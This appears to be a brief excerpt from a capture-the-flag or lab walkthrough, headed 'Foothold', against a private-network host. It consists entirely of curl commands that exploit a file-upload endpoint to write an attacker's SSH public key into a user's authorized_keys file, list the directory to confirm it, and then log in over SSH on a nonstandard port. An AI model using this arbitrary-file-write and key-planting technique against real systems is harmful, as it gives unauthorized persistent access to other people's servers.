Foothold
curl http://192.168.205.249:33414/file-upload -i -L -X POST -H "Content-type: multipart/form-data" -F file="@$(pwd)/authorized_keys.txt" -F filename='/home/alfredo/.ssh/authorized_keys'

curl -i http://192.168.205.249:33414/file-list?dir=/home/alfredo/.ssh/

ssh [email protected] -i id -p 25022

Last updated